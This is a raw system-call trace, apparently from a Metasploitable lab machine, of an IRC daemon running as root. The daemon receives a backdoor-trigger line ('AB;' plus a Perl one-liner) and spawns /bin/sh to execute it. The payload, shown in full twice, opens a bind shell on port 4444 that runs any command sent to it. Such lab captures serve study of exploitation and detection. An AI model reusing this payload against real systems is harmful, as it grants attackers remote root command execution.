4519  07:09:24.223791 select(1024, [2 3 4 5 6 7 9], [], NULL, {0, 430000}) = 1 (in [2], left {0, 250000})

4519  07:09:24.406655 clock_gettime(CLOCK_MONOTONIC, {974, 223676897}) = 0

4519  07:09:24.406677 time(NULL)        = 1495624164

4519  07:09:24.406687 time(NULL)        = 1495624164

4519  07:09:24.406703 gettimeofday({1495624164, 406707}, NULL) = 0

4519  07:09:24.406716 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:09:24.406868 clock_gettime(CLOCK_MONOTONIC, {974, 223882276}) = 0

4519  07:09:24.406880 gettimeofday({1495624164, 406883}, NULL) = 0

4519  07:09:24.406891 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:09:24.407024 clock_gettime(CLOCK_MONOTONIC, {974, 224037364}) = 0

4519  07:09:24.407036 accept(2, 0, NULL) = 8

4519  07:09:24.407055 getpeername(8, {sa_family=AF_INET, sin_port=htons(44177), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:09:24.407094 fcntl64(8, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:09:24.407106 fcntl64(8, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:09:24.407119 setsockopt(8, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:09:24.407131 setsockopt(8, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:09:24.407142 setsockopt(8, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:09:24.407154 getsockopt(8, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:09:24.407168 setsockopt(8, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:09:24.407183 clock_gettime(CLOCK_MONOTONIC, {974, 224196999}) = 0

4519  07:09:24.407195 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 10

4519  07:09:24.407207 fcntl64(10, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:09:24.407217 fcntl64(10, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:09:24.407226 fcntl64(10, F_SETFD, FD_CLOEXEC) = 0

4519  07:09:24.407235 connect(10, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:09:24.407252 send(10, "Y\255\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:09:24.407269 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:09:24.407269 gettimeofday({1495624164, 407270}, NULL) = 0

4519  07:09:24.407278 select(1024, [2 3 4 5 6 7 9 10], [], NULL, {1, 0}) = 1 (in [10], left {0, 990000})

4519  07:09:24.413015 clock_gettime(CLOCK_MONOTONIC, {974, 230034471}) = 0

4519  07:09:24.413048 recvfrom(10, "Y\255\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\310\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:09:24.413102 close(10)         = 0

4519  07:09:24.413125 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:09:24.413139 send(8, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:09:24.413196 time(NULL)        = 1495624164

4519  07:09:24.413209 time(NULL)        = 1495624164

4519  07:09:24.413239 gettimeofday({1495624164, 413243}, NULL) = 0

4519  07:09:24.413251 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:09:24.413307 clock_gettime(CLOCK_MONOTONIC, {974, 230319802}) = 0

4519  07:09:24.413317 gettimeofday({1495624164, 413321}, NULL) = 0

4519  07:09:24.413328 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 540000})

4519  07:09:24.870607 clock_gettime(CLOCK_MONOTONIC, {974, 687628975}) = 0

4519  07:09:24.870630 recv(9, "PRIVMSG  #testit3 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55

4519  07:09:24.870654 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870674 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870689 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870703 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870716 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870738 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870751 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870765 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870778 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870791 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870804 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870817 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870830 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870843 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870856 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870870 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870883 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870896 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870909 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870923 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870936 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.870949 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 80000}, ...}) = 0

4519  07:09:24.871006 gettimeofday({1495624164, 871011}, NULL) = 0

4519  07:09:24.871019 select(1024, [2 3 4 5 6 7 8 9], [], NULL, {1, 0}) = 1 (in [8], left {1, 0})

4519  07:09:24.871076 clock_gettime(CLOCK_MONOTONIC, {974, 688088559}) = 0

4519  07:09:24.871087 recv(8, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:09:24.871115 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:09:24.871135 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:09:24.871147 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:09:24.871161 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 5519

5519  07:09:24.871231 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

5519  07:09:24.871245 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

5519  07:09:24.871255 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5519  07:09:24.871268 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

5519  07:09:24.871372 brk(0)            = 0x80f9000

5519  07:09:24.871393 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5519  07:09:24.871410 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f63000

5519  07:09:24.871426 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5519  07:09:24.871442 open("/etc/ld.so.cache", O_RDONLY) = 1

5519  07:09:24.871468 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5519  07:09:24.871518 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f5b000

5519  07:09:24.871547 close(1)          = 0

5519  07:09:24.871572 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5519  07:09:24.871587 open("/lib/libncurses.so.5", O_RDONLY) = 1

5519  07:09:24.871600 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

5519  07:09:24.871697 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

5519  07:09:24.871715 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f2b000

5519  07:09:24.871726 mmap2(0xb7f58000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f58000

5519  07:09:24.871743 close(1)          = 0

5519  07:09:24.871755 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5519  07:09:24.871768 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5519  07:09:24.871782 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5519  07:09:24.871870 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5519  07:09:24.871886 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f27000

5519  07:09:24.871897 mmap2(0xb7f29000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f29000

5519  07:09:24.871913 close(1)          = 0

5519  07:09:24.871924 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5519  07:09:24.871937 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5519  07:09:24.871961 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5519  07:09:24.872089 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5519  07:09:24.872105 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f26000

5519  07:09:24.872119 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd7000

5519  07:09:24.872130 mmap2(0xb7f20000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f20000

5519  07:09:24.872144 mmap2(0xb7f23000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f23000

5519  07:09:24.872158 close(1)          = 0

5519  07:09:24.872180 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dd6000

5519  07:09:24.872191 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd66b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5519  07:09:24.872246 mprotect(0xb7f20000, 4096, PROT_READ) = 0

5519  07:09:24.872282 munmap(0xb7f5b000, 29913) = 0

5519  07:09:24.872308 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5519  07:09:24.872322 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

5519  07:09:24.872341 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8d7a90) = -1 ENOTTY (Inappropriate ioctl for device)

5519  07:09:24.872370 brk(0)            = 0x80f9000

5519  07:09:24.872380 brk(0x80fa000)    = 0x80fa000

5519  07:09:24.872391 brk(0x80fb000)    = 0x80fb000

5519  07:09:24.872407 getuid32()        = 0

5519  07:09:24.872417 getgid32()        = 0

5519  07:09:24.872425 geteuid32()       = 0

5519  07:09:24.872434 getegid32()       = 0

5519  07:09:24.872460 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5519  07:09:24.872476 time(NULL)        = 1495624164

5519  07:09:24.872516 brk(0x80fc000)    = 0x80fc000

5519  07:09:24.872532 brk(0x80fd000)    = 0x80fd000

5519  07:09:24.872564 open("/proc/meminfo", O_RDONLY) = 1

5519  07:09:24.872585 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

5519  07:09:24.872603 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f62000

5519  07:09:24.872614 read(1, "MemTotal:      1035240 kB\nMemFree:        647636 kB\nBuffers:         63296 kB\nCached:         169204 kB\nSwapCached:          0 kB\nActive:         251804 kB\nInactive:       109660 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        647396 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            6200 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52004 kB\nSlab:            14840 kB\nSReclaimable:     6900 kB\nSUnreclaim:       7940 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

5519  07:09:24.872695 close(1)          = 0

5519  07:09:24.872706 munmap(0xb7f62000, 4096) = 0

5519  07:09:24.872717 brk(0x80fe000)    = 0x80fe000

5519  07:09:24.872743 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5519  07:09:24.872756 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5519  07:09:24.872767 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5519  07:09:24.872779 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5519  07:09:24.872791 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

5519  07:09:24.872802 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

5519  07:09:24.872815 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5519  07:09:24.872826 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5519  07:09:24.872839 uname({sys="Linux", node="metasploitable", ...}) = 0

5519  07:09:24.872886 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

5519  07:09:24.872907 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5519  07:09:24.872925 brk(0x8100000)    = 0x8100000

5519  07:09:24.872936 getcwd("/etc/unreal", 4096) = 12

5519  07:09:24.872961 getpid()          = 5519

5519  07:09:24.873005 getppid()         = 4519

5519  07:09:24.873021 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5519  07:09:24.873056 stat64("/sbin/sh", 0xbf8d7a68) = -1 ENOENT (No such file or directory)

5519  07:09:24.873068 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5519  07:09:24.873085 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5519  07:09:24.873108 socket(PF_FILE, SOCK_STREAM, 0) = 1

5519  07:09:24.873121 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5519  07:09:24.873132 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5519  07:09:24.873154 close(1)          = 0

5519  07:09:24.873165 socket(PF_FILE, SOCK_STREAM, 0) = 1

5519  07:09:24.873175 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5519  07:09:24.873185 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5519  07:09:24.873202 close(1)          = 0

5519  07:09:24.873215 open("/etc/nsswitch.conf", O_RDONLY) = 1

5519  07:09:24.873229 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

5519  07:09:24.873246 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f62000

5519  07:09:24.873256 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

5519  07:09:24.873304 read(1, "", 4096) = 0

5519  07:09:24.873314 close(1)          = 0

5519  07:09:24.873323 munmap(0xb7f62000, 4096) = 0

5519  07:09:24.873339 open("/etc/ld.so.cache", O_RDONLY) = 1

5519  07:09:24.873350 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5519  07:09:24.873366 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f5b000

5519  07:09:24.873376 close(1)          = 0

5519  07:09:24.873386 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5519  07:09:24.873400 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

5519  07:09:24.873415 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

5519  07:09:24.873555 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

5519  07:09:24.873573 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcd000

5519  07:09:24.873585 mmap2(0xb7dd4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dd4000

5519  07:09:24.873619 close(1)          = 0

5519  07:09:24.873631 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5519  07:09:24.873644 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

5519  07:09:24.873657 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

5519  07:09:24.873742 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

